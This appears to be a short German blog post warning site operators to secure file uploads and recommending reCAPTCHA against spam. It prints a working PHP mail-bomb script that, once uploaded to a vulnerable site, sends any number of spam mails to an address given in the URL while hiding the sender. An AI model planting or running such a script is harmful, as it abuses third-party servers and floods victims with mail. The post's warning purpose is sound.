Wir haben schon auf allen möglichen Websites darauf hingewiesen, Dateiuploadmöglichkeiten genügend abzusichern. folgende kleines Snippet soll zeigen, wie stinkeinfach es ist eine WebSite mit Dateiupload als Spam und Virenschleuder zu verwenden.
$t="Sp0wnd!";
$n="Y0u @r3 Sp0wnd by ~B4CksT0r~";
$a="~B@(ksT0r~";
$e=$_GET['e'];
$az=$_GET['az'];
for($i=0;$i<$az;$i++){
mail($e, $t, $n,"From: $a <$a>");
}
?>
Dabei ist dieser kleine Mehrzeiler nicht gerade ein Ausbruch an Intelligenz, sondern eher Mittelklasse, da er nicht mehr wie fachliche Grundkenntnisse verlangt und trotzdem wird die IP schön versteckt nur für wenige bekannt garantiert nie den wirklichen Spammer verraten. Es ist andererseits mit der FOR Abfrage schon direkt ein Riesenschritt von den profanen und allseits beliebten Übergabe URLs der Spammer für Gästebücher und andere Kommunikationsmöglichkeiten mit WebSites.
Wir empfehlen zur Spamvermeidung durch ÜbergabeURLs das bewährte ReCaptcha System:
http://www.google.com/recaptcha
Keine Kommentare:
Kommentar veröffentlichen